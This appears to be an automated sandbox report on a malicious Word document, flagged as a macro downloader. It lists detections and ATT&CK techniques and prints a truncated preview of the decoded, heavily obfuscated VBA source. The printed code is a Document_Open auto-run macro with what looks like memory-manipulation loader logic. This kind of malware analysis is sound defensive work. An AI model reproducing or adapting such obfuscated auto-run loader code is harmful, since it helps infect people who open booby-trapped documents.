Verdict: MALICIOUS
Risk Score: 122
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV heuristic and the presence of VBA macros, specifically a Document_Open macro, indicate malicious intent. The VBA macro code appears to be obfuscated but is designed to download and execute a second-stage payload, as suggested by the 'Doc.Downloader' classification. The benign URLs extracted are not indicative of malicious activity.
Heuristics 4
- ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13645 bytes |

SHA-256: c2e228e51e65b4d5ba4450fcb8c3e921dfb6e30bda4723f75bff9b8d2519807b
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Function miscreance(losing)
Dim trainbearer As Long
Dim beamish As Byte
Dim decadent As Long
Dim compiler As String
#If (57 - 111 + 454 + 46 - 62 + 316) > ((4 - 125 + 441) - (90 - 126 + 576) * 1) And ((51 - 106 + 83) - (72 - 111 + 67)) * 2 < (Win64) Then
Dim centuplicate As String
Dim shingling As LongPtr
paillasse = 109 - 125 + 24
Dim caique As LongPtr
Dim nonrestrictive As String
Dim istic As Variant
Dim birdseye As LongPtr
Dim window As String
advertising = VarPtr(shingling)
Commit = evagation(advertising, VarPtr(losing) + (114 - 58 - 48), paillasse)
#ElseIf (48 - 87 + 439 + 71 - 29 + 258) > ((99 - 102 + 323) - (78 - 75 + 537) * 1) And Not ((40 - 80 + 68) - (70 - 45 + 3)) * 2 < (Win64) Then
Dim shingling As Long
paillasse = 104 - 127 + 27
Dim caique As Long
Dim birdseye As Long
#End If
advertising = VarPtr(shingling)
Commit = genre(advertising, VarPtr(losing) + (24 - 125 + 109), paillasse)
maidenly = 5 - 121 + 115
caique = 100 - 113 + 13
offuscate = 16 - 67 + 51
birdseye = 114 - 128 + 9932
arrack = 14 - 98 + 4180
quadfiform = 1 - 108 + 171
transitorily = abutting(ByVal maidenly, _
caique, ByVal offuscate, birdseye, ByVal arrack, _
ByVal quadfiform)
bathe = "tripalmitin"
prosalprosy = dirtily And 423
exchanger = genre(caique, shingling, 82 - 78 + 5879)
gath = 17 + 52
Pmt 0, gath, 3616, 33767, 4
miscreance = caique
End Function

Private Sub Document_Open()
Dim doublebogey As Byte
Dim discretional As String
recordbreaking = crucifer
bedeck = tavern
reservedly
mellifluous = 11 + 34
Pmt 0, mellifluous, 16970, 47194, 2
End Sub

Sub reservedly()
Dim miscegenate As String
Dim guiltridden As Variant
activeness.unscoured.Value = Day(#12/5/2013#)
varday = morocco = "ho"
binge = "moniliales"
deconstructionist = "egurgitate"
su = "cacodemon"
dewey = "harping"
bushranger = symbolize
alpestrine = cocozelle
aphorism = "blebby"
Set drunk = activeness.unscoured.SelectedItem
dartre = 36 + 42
Pmt 0, dartre, 4082, 44229, 2
militat = drunk.Name
precipitously = 113 - 23 + 7754
ambassadorial = Right(militat, precipitously)
down = shrilly(ambassadorial)
stillroom = 6 + 29
Pmt 0, stillroom, 26422, 14419, 7
marathon = "containerized"
#If (12 - 37 + 425 + 109 - 27 + 218) > ((17 - 46 + 349) - (120 - 42 + 462) * 1) And ((95 - 70 + 3) - (8 - 13 + 33)) * 2 < (Win64) Then
Dim celllike As Long
Dim delire As LongPtr
Dim homobasidiomycetes As LongPtr
Dim lifeless As Variant
#ElseIf (100 - 115 + 415 + 124 - 104 + 280) > ((29 - 33 + 324) - (75 - 92 + 557) * 1) And Not ((114 - 112 + 26) - (58 - 28 - 2)) * 2 < (Win64) Then
Dim godmother As Variant
Dim homobasidiomycetes As Long
Dim dimsightedness As Variant
Dim delire As Long
#End If
ceratozamia = 46 - 45 - 1
dispense = misbelieve
foundering = 3 - 31 + 4124
praises = 27 + 19
Pmt 0, praises, 2397, 20766, 5
battledore = "cafeteria"
tulu = "sociolinguistics"
passive = 34 + 41
Pmt 0, passive, 33175, 52385, 3
joyless = down
benzoin = strix
delire = miscreance(joyless)
matross = scherzo
#If (102 - 42 + 340 + 40 - 1 + 261) > ((122 - 23 + 221) - (116 - 14 + 438) * 1) And ((49 - 8 - 13) - (29 - 94 + 93)) * 2 < (Win64) Then
Dim anaphor As String
Dim grounded As LongPtr
Dim worrying As LongPtr
Dim gracious As LongPtr
ameer = 51 - 112 + 2125
#ElseIf (126 - 31 + 305 + 46 - 20 + 274) > ((59 - 62 + 323) - (72 - 32 + 500) * 1) And Not ((33 - 19 + 14) - (117 - 11 - 78)) * 2 < (Win64) Then
Dim grounded As Long
omophagia = 111 - 75 + 745
Dim worrying As Long
Dim gracious As Long
ameer = omophagia + 3459
#End If
Dim medieval As Byte
Dim opinon As Integer
grounded = 112 - 101 - 11
homobasidiomycetes = delire + ameer
worrying = 45 - 47 + 201529
gracious = 39 - 89 + 3550
squirming = baptize(worrying, grounded, homoba ... (truncated)
```